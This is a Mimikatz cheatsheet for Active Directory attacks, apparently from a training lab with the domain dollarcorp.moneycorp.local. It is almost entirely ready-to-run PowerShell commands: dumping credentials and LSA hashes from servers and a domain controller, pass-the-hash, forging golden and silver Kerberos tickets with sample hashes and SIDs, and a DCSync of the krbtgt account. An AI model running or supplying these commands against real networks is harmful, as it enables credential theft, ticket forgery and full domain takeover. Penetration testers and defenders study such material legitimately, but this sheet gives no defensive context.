Mimikatz Cheatsheet
Dump Creds
Over Pass The Hash
Dump Hashes
Creating Tickets
Create A Golden Ticket
Create A Silver Ticket
DCSync Attack
DA privileges required!
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -ComputerName @("server1","server2")
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlm_hash> /run:powershell.exe"
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_SID> /krbtgt:<NTLM_hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'
DA privileges required!
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'